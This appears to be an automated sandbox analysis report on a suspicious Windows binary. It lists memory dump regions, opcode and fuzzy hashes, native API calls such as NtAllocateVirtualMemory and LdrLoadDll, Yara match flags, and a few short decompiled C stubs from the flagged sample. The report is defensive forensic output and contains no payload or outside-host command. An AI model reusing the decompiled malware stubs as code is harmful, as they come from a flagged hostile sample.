                                          • Instruction ID: ff89fe7992f95ba91997f7531b2b7163c9c8ed297f3601feadab65e23c264afc
                                          • Opcode Fuzzy Hash: aa94ef80438b894895b5685cd006a946f3136156e6e92a21b9753d3ae731b6a4
                                          • Instruction Fuzzy Hash: FA11E0B6D006498FDB10CF9AD444BDEFBF5EB88324F14846AC959A7610C378A545CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetWindowLongW.USER32(?,?,?), ref: 00B5DF1D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653424229.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false
                                          Similarity
                                          • API ID: LongWindow
                                          • String ID:
                                          • API String ID: 1378638983-0
                                          • Opcode ID: 1d21235265986f76c0d1dad58b2ef7ff16f1081d78aae227c10397b47ad7a7bd
                                          • Instruction ID: d89c1b159a2ab68da9beeda7e78790690d94d6b6c2046cdf93bcc0cf5eaa2a94
                                          • Opcode Fuzzy Hash: 1d21235265986f76c0d1dad58b2ef7ff16f1081d78aae227c10397b47ad7a7bd
                                          • Instruction Fuzzy Hash: 7A11D0B58002499FDB20CF9AD484BDEBBF8EB88324F14855AE959A7600C374A944CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetWindowLongW.USER32(?,?,?), ref: 00B5DF1D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653424229.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false
                                          Similarity
                                          • API ID: LongWindow
                                          • String ID:
                                          • API String ID: 1378638983-0
                                          • Opcode ID: e08cde13bde1bb181d37da7049730ffa20f50bcdc8b055fd923de884236811dd
                                          • Instruction ID: 0984fc374ea34dde74d294056017bd0d1924a523119cf2fb542a26ad16d50a1c
                                          • Opcode Fuzzy Hash: e08cde13bde1bb181d37da7049730ffa20f50bcdc8b055fd923de884236811dd
                                          • Instruction Fuzzy Hash: 1C1112B5900349DFDB20CF99D584BDEBBF8EB88320F14855AD959A3740C374AA44CFA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653231350.00000000009ED000.00000040.00000001.sdmp, Offset: 009ED000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ba7f77ae2d2020628a5dd4a6e53b02ed3bf9b23ef1b01f2a05f687e797df2d76
                                          • Instruction ID: c893e86d6619eeaf96d0a1504b00d4ce74a4ec48c0226e8999202a2331763201
                                          • Opcode Fuzzy Hash: ba7f77ae2d2020628a5dd4a6e53b02ed3bf9b23ef1b01f2a05f687e797df2d76
                                          • Instruction Fuzzy Hash: 2F2129B1504384DFDB06CF14D9C0B26BF69FB98328F248669F9054B25AC73ADC56CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653392079.0000000000AFD000.00000040.00000001.sdmp, Offset: 00AFD000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: aba1d6872009fdebab3470ddde5608e44a38a3c8fbee440e47e04709042d8e2c
                                          • Instruction ID: 48447f9fd93973f9471359513294c59e76b4b74423703bd7fc440ba7521344f9
                                          • Opcode Fuzzy Hash: aba1d6872009fdebab3470ddde5608e44a38a3c8fbee440e47e04709042d8e2c
                                          • Instruction Fuzzy Hash: 3D213771504248EFDB16CF50D4C0B26FB66FB84314F24CA69EA4A4B246CB36D807CA61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653392079.0000000000AFD000.00000040.00000001.sdmp, Offset: 00AFD000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 88cd9dc9522f8d980937c37bb1201ebc52fc3f73170c4f8df23b0a354b172f02
                                          • Instruction ID: 268604e2995227f921028af511d0637b306c5ed6b90f07f45d44ed6ac55b4568
                                          • Opcode Fuzzy Hash: 88cd9dc9522f8d980937c37bb1201ebc52fc3f73170c4f8df23b0a354b172f02
                                          • Instruction Fuzzy Hash: 8C2180755093C48FDB03CF20D994715BF71EB46314F28C5EAD8498B657C33A980ACB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653231350.00000000009ED000.00000040.00000001.sdmp, Offset: 009ED000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 987ae082b2f359035be596b84dcad585c5d9c7b80c54fd1badd6de72d9b1f1a2
                                          • Instruction ID: 56d05f7beb8667f4ccdfecc37686e5c87655c3656af5cec4800b4823c16bcd01
                                          • Opcode Fuzzy Hash: 987ae082b2f359035be596b84dcad585c5d9c7b80c54fd1badd6de72d9b1f1a2
                                          • Instruction Fuzzy Hash: C111E676404280DFDF12CF10D9C4B16BF71FB94324F24C6A9E8050B61AC33AD856CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653231350.00000000009ED000.00000040.00000001.sdmp, Offset: 009ED000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4b2f5b0e0e09d7f57d89cb8f3bd0f535f506af7fe9287101acfd2432d4ca38e3
                                          • Instruction ID: f7dec48d9d2793be327d2ee4c65af63265330de49022a3bb30753853f4cd48b3
                                          • Opcode Fuzzy Hash: 4b2f5b0e0e09d7f57d89cb8f3bd0f535f506af7fe9287101acfd2432d4ca38e3
                                          • Instruction Fuzzy Hash: 5D01F7B100A3C4AAE7118B17CC80B66BB9CEF41764F18C55AED095B286C37A9C44CAB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653231350.00000000009ED000.00000040.00000001.sdmp, Offset: 009ED000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9b96debff970fc5aa38d01900921025505f97df078b815fe75a41f51337df064
                                          • Instruction ID: 137e00c1bb21109ee4a066d5247eb627e20bfd2903cb37f9610de6317b419a88
                                          • Opcode Fuzzy Hash: 9b96debff970fc5aa38d01900921025505f97df078b815fe75a41f51337df064
                                          • Instruction Fuzzy Hash: E6F062B1405288AFE7118B16DCC4B62FBACEF91774F18C45AED085B686C3799C44CAB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: 9*J@$^v
                                          • API String ID: 0-2667801510
                                          • Opcode ID: 4f3e83b3694c89adc95ccab447f2d766c9d32946d1c35670b3af4f362b4e1fce
                                          • Instruction ID: 02a3d2c9f2d39980e6e54325f7dbbd5dadea10caf22c6802d16e20630800659f
                                          • Opcode Fuzzy Hash: 4f3e83b3694c89adc95ccab447f2d766c9d32946d1c35670b3af4f362b4e1fce
                                          • Instruction Fuzzy Hash: 8DA1E174E0520A8F9F44CFA9D5804EEFBF2EF89300F24942AD425BB254D7359A428FA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: ^v
                                          • API String ID: 0-4076843895
                                          • Opcode ID: b010f8d6e05fdb12cf97587333c2b24795bd08655e31311daace9decda1eef95
                                          • Instruction ID: 3ee17ed8bbba44df033008b27d47e5b5f67f3cccdb6f145988508eb6743c3090
                                          • Opcode Fuzzy Hash: b010f8d6e05fdb12cf97587333c2b24795bd08655e31311daace9decda1eef95
                                          • Instruction Fuzzy Hash: 7F91E174E052098FDF44CFA9D5805EEFBF2EF89300F24942AD425BB254D7359A428FA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653424229.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6486c9f6187728ac875218e8c17b7e44b6881a3515747ab9e288926a6075650e
                                          • Instruction ID: 417ffb92add46cd0da9f76d59e61551cac38e55eda0a8f3007ce7607204ebf2d
                                          • Opcode Fuzzy Hash: 6486c9f6187728ac875218e8c17b7e44b6881a3515747ab9e288926a6075650e
                                          • Instruction Fuzzy Hash: C8527BB1502F26CFD720CF14ECE8699BBB1FB40319B91435AC5615F6A0EBB8658ACF44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653424229.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7e846c476d2796c9873b04ea970585391d930a31f2605c0c3a708d214ac956b0
                                          • Instruction ID: 16746360b827a4074f8aebecf29c1d15aeb16ee328a2cf20cbe846bc2eb3e6a5
                                          • Opcode Fuzzy Hash: 7e846c476d2796c9873b04ea970585391d930a31f2605c0c3a708d214ac956b0
                                          • Instruction Fuzzy Hash: 34A15032E00619CFCF15DFA5C844ADDBBF2FF85301B1585AAE905BB221EB35A949CB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 51f756829a700ce798e99a299943b97d8491452fdc65c6c4db90d35c9f691749
                                          • Instruction ID: ecb4d1454be14ca826c80412bf2b3afab9b3e5818a349ae312f271a505f4a114
                                          • Opcode Fuzzy Hash: 51f756829a700ce798e99a299943b97d8491452fdc65c6c4db90d35c9f691749
                                          • Instruction Fuzzy Hash: D2917070E002199FDF10CFA9C9917EEBBF2AF88315F14812AE425A7354DB749945CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3c9f2d723eef13c7bdb2aab64304a82c46e07eead82a292b1079ed5df2164634
                                          • Instruction ID: 711d91fdd81053769ba91a0b0a7d9a951f40a4cd455a7579b8586286f4cb5c04
                                          • Opcode Fuzzy Hash: 3c9f2d723eef13c7bdb2aab64304a82c46e07eead82a292b1079ed5df2164634
                                          • Instruction Fuzzy Hash: EB613871E04619CBDB28CF66C8447AEF7B6BFC9301F14D5AAC42DA7254EB345A858F10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 56bdebe09e06b8ec07081e2e6e581c97c4a5fb06e63b2872d58a3a57143589e0
                                          • Instruction ID: fbbf3130ed50dad55d5d70b5cbae9477ff7a1f7062252d8e5f30b1a9135c6ab5
                                          • Opcode Fuzzy Hash: 56bdebe09e06b8ec07081e2e6e581c97c4a5fb06e63b2872d58a3a57143589e0
                                          • Instruction Fuzzy Hash: 8D5128B1E006298BDB28CF66D9447AEF7B2BFC9301F14C5AAC419A7214EB345A858F10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 388e4a1f24129a1022429d206a833ede286674f748508c9c77ea1fdb7b6b2fba
                                          • Instruction ID: e84ccc35a29fd84750f372681638b241193027cfc8d9a24d92403d763fe49dc4
                                          • Opcode Fuzzy Hash: 388e4a1f24129a1022429d206a833ede286674f748508c9c77ea1fdb7b6b2fba
                                          • Instruction Fuzzy Hash: 02513671E0062ACBDB64CF65D984BEDF7B2BF89301F10D6E6D41AA7600E7349A858F14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d346fe01596465a05c81502c2bb4179fadab55265d46b2bd5c0252e252baa848
                                          • Instruction ID: 0552ac2554f6e4bb7ef65a8f6768e4015027bfea53abb37724237600b5722196
                                          • Opcode Fuzzy Hash: d346fe01596465a05c81502c2bb4179fadab55265d46b2bd5c0252e252baa848
                                          • Instruction Fuzzy Hash: 87414A70D0061ACBDB24CF51D980BEDF7B2BB89301F1096E6D51AB7600E7749AC58F14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          APIs
                                          • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID: 2MA$2MA
                                          • API String ID: 2738559852-947276439
                                          • Opcode ID: 1602d10d5101f98693d435c84c5cfb66a4b2adc4893b173d21e0c6d2e8c925fd
                                          • Instruction ID: f1f2dead1fad3e74dad8768281147501293739708fdb763128d3229441b3bfc5
                                          • Opcode Fuzzy Hash: 1602d10d5101f98693d435c84c5cfb66a4b2adc4893b173d21e0c6d2e8c925fd
                                          • Instruction Fuzzy Hash: 5A2106B2200108AFCB18DF99DC91EEB77ADEF8C354F158249FA1DA7241C630E851CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID: 2MA$2MA
                                          • API String ID: 2738559852-947276439
                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                          • Instruction ID: e2eeafcdabc96c90d19f56ab9cfe9238ee24689222a5818d11d4b5cf4f7c0d6d
                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                          • Instruction Fuzzy Hash: 90F0B7B2210208AFCB14DF89DC91EEB77ADEF8C754F158649BE1D97241D630E851CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID: wKA
                                          • API String ID: 823142352-3165208591
                                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                          • Instruction ID: 0d977cd1f4fbd36c9bd444ef8f6a04c43f7f15de33bda2cf86b45a3658e1eede
                                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                          • Instruction Fuzzy Hash: BFF0BDB2211208AFCB08CF89DC95EEB77ADAF8C754F158248BA1D97241C630E8518BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0040ACC0(void* __eflags, void* _a4, intOrPtr _a8) {
                                          				char* _v8;
                                          				struct _EXCEPTION_RECORD _v12;
                                          				struct _OBJDIR_INFORMATION _v16;
                                          				char _v536;
                                          				void* _t15;
                                          				struct _OBJDIR_INFORMATION _t17;
                                          				struct _OBJDIR_INFORMATION _t18;
                                          				void* _t30;
                                          				void* _t31;
                                          				void* _t32;
                                          
                                          				_v8 =  &_v536;
                                          				_t15 = E0041C640( &_v12, 0x104, _a8);
                                          				_t31 = _t30 + 0xc;
                                          				if(_t15 != 0) {
                                          					_t17 = E0041CA60(__eflags, _v8);
                                          					_t32 = _t31 + 4;
                                          					__eflags = _t17;
                                          					if(_t17 != 0) {
                                          						E0041CCE0( &_v12, 0);
                                          						_t32 = _t32 + 8;
                                          					}
                                          					_t18 = E0041AE90(_v8);
                                          					_v16 = _t18;
                                          					__eflags = _t18;
                                          					if(_t18 == 0) {
                                          						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                          						return _v16;
                                          					}
                                          					return _t18;
                                          				} else {
                                          					return _t15;
                                          				}
                                          			}

                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                          • Instruction ID: 8d9c8c5cc187846e167d7fc499b748faaade23025a89af1130ee390205ce80a6
                                          • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                          • Instruction Fuzzy Hash: C40152B5D4020DA7DB10DBE5DC42FDEB7789F14308F0041AAE908A7281F634EB54C795
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 82%
                                          			E00419E7A(void* __ecx, intOrPtr _a4, void* _a8) {
                                          				long _t10;
                                          				void* _t14;
                                          				void* _t15;
                                          
                                          				asm("lock loopne 0x48");
                                          				_t7 = _a4;
                                          				_t4 = _t7 + 0x10; // 0x300
                                          				_t5 = _t7 + 0xc50; // 0x40a913
                                          				E0041A950(_t14, _a4, _t5,  *_t4, 0, 0x2c, _t15);
                                          				_t10 = NtClose(_a8); // executed
                                          				return _t10;
                                          			}

                                          APIs
                                          • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 0eff1f3a1da78b7e2ae0dee9c4d3c380858e8fe73344ae004333b44432362a1b
                                          • Instruction ID: 9344fdb57475838e8843889c56ecfbf53c8809c4df51adc41ba2a37e679dc5d7
                                          • Opcode Fuzzy Hash: 0eff1f3a1da78b7e2ae0dee9c4d3c380858e8fe73344ae004333b44432362a1b
                                          • Instruction Fuzzy Hash: 3BF03CB5200208ABCB10EF99DC85DEB77ADEF88364F11854AFE5C97281D634E9508BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E00419F2D(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                          				intOrPtr _v117;
                                          				long _t16;
                                          				void* _t23;
                                          				void* _t24;
                                          
                                          				asm("bound esi, [esi]");
                                          				_v117();
                                          				_t4 = _a4 + 0xc60; // 0xca0
                                          				E0041A950(_t23, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30, _t24);
                                          				_t16 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                          				return _t16;
                                          			}


                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: 7578e27667dd9c6b3e4c9dabb41f2aaa1eeda76833debe7cfa1d839f5bf2ed05
                                          • Instruction ID: 38e4de3d10a0b26fbd05d6a43c61f977fec0be050730d6f047586e43723b4cab
                                          • Opcode Fuzzy Hash: 7578e27667dd9c6b3e4c9dabb41f2aaa1eeda76833debe7cfa1d839f5bf2ed05
                                          • Instruction Fuzzy Hash: B4F058B2200108AFCB24DF99CC81EEB77A8EF88350F118509FE49A7241C630E810CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                          • Instruction ID: c2721ea4e084a79d388e091216dcc94a475298a8aa449db6134383b78daf1f40
                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                          • Instruction Fuzzy Hash: 7DF015B2210208AFCB14DF89CC81EEB77ADAF88754F118549BE1897241C630F810CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                          • Instruction ID: abd226b249efdbe90954a2e5a1f5a103ee35f8531edac2b51595525400ebd06d
                                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                          • Instruction Fuzzy Hash: FED01776200214ABD710EB99CC86EE77BACEF48760F15449ABA5C9B242C530FA5086E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 6b230cbff2933367e649220cb26c385f88a73e6ab73d2f393569aef6cb55be31
                                          • Instruction ID: c9f8808e1f06c46900b7c8adf83ed800a14a7b82f097fa5f9bc898d1586b4bc9
                                          • Opcode Fuzzy Hash: 6b230cbff2933367e649220cb26c385f88a73e6ab73d2f393569aef6cb55be31
                                          • Instruction Fuzzy Hash: 409002A174110452D10061994414B064095E7E1345FD1C015E1094594DCA59CC5671A6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 15e365d88cc041173329ef930983d380daf90116b4d68cfb0f2b2c94d0c00e16
                                          • Instruction ID: 2a925c913d4eb14694f30305c9a07ae4016602b9f1b9202e429b6573b088cb38
                                          • Opcode Fuzzy Hash: 15e365d88cc041173329ef930983d380daf90116b4d68cfb0f2b2c94d0c00e16
                                          • Instruction Fuzzy Hash: ED9002B160110412D140719944047464095A7D0345FD1C011A5094594ECA998DD976E5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: c5a0fa1cec57d4d269b59d6ef0ee539898b49c144664688f15cb3d26a70f5744
                                          • Instruction ID: d8e52f15c7f924edadf17b995ec474168350a0365db13ea9293740be086422d0
                                          • Opcode Fuzzy Hash: c5a0fa1cec57d4d269b59d6ef0ee539898b49c144664688f15cb3d26a70f5744
                                          • Instruction Fuzzy Hash: 77900261A0110512D10171994404616409AA7D0285FD1C022A1054595ECE658996B1B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 0bb241a068594bce0ea21ad88b7c3cd2aac9409c606675ab906e010aa91f5797
                                          • Instruction ID: 5d46f5170ff25ea85e63f61183180231fd813cb2bb7de440b37e3854bc595194
                                          • Opcode Fuzzy Hash: 0bb241a068594bce0ea21ad88b7c3cd2aac9409c606675ab906e010aa91f5797
                                          • Instruction Fuzzy Hash: E5900261642141625545B19944045078096B7E02857D1C012A1444990CC966985AE6A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: d00d9d68adcd620324ddbee2ebb4d6fd8a59ce00ecc81f187ce18a6c23b6f9e3
                                          • Instruction ID: 59d5c1e6039382d3cafc06334fa9545f16c273e9c02e43a8d977e68e81023970
                                          • Opcode Fuzzy Hash: d00d9d68adcd620324ddbee2ebb4d6fd8a59ce00ecc81f187ce18a6c23b6f9e3
                                          • Instruction Fuzzy Hash: 8D90027160110423D111619945047074099A7D0285FD1C412A0454598DDA968956B1A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 076fc5c8653c18727cb08bcb26cd61002988a18888d032100e8343d87520f6ce
                                          • Instruction ID: 5cad27c51edd512369f8100342d8c5ce731c028177fb122b0a2a6a4ded7fb80e
                                          • Opcode Fuzzy Hash: 076fc5c8653c18727cb08bcb26cd61002988a18888d032100e8343d87520f6ce
                                          • Instruction Fuzzy Hash: D890027160150412D1006199481470B4095A7D0346FD1C011A1194595DCA65885575F1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: e4fbcd8f6a9c65e88591ee136591a2b5f4feec7ad4c0fae48282e4018b452ff7
                                          • Instruction ID: 055e15fee905155aa8e077ab1c262a24af6adb894c7841596e7f97684aab97c6
                                          • Opcode Fuzzy Hash: e4fbcd8f6a9c65e88591ee136591a2b5f4feec7ad4c0fae48282e4018b452ff7
                                          • Instruction Fuzzy Hash: 20900261A0110052414071A988449068095BBE12557D1C121A09C8590DC999886966E5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: ef6462cb65273a2974faa4a9fdcca08ebe77662a9c0a2868872f17b870e71a58
                                          • Instruction ID: 5f46615f644c047551818c09a5d0f192ef81776ccb611028164636e70338ab1b
                                          • Opcode Fuzzy Hash: ef6462cb65273a2974faa4a9fdcca08ebe77662a9c0a2868872f17b870e71a58
                                          • Instruction Fuzzy Hash: 5C90026161190052D20065A94C14B074095A7D0347FD1C115A0184594CCD55886565A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4c66ff9a4478d9bbb8529203072200f47768c45a053c050e59cedf310584231a
                                          • Instruction ID: b941196addefbab8b7d9e6bc204d17f654ab9dd0e93f0d023cdf18e988a69181
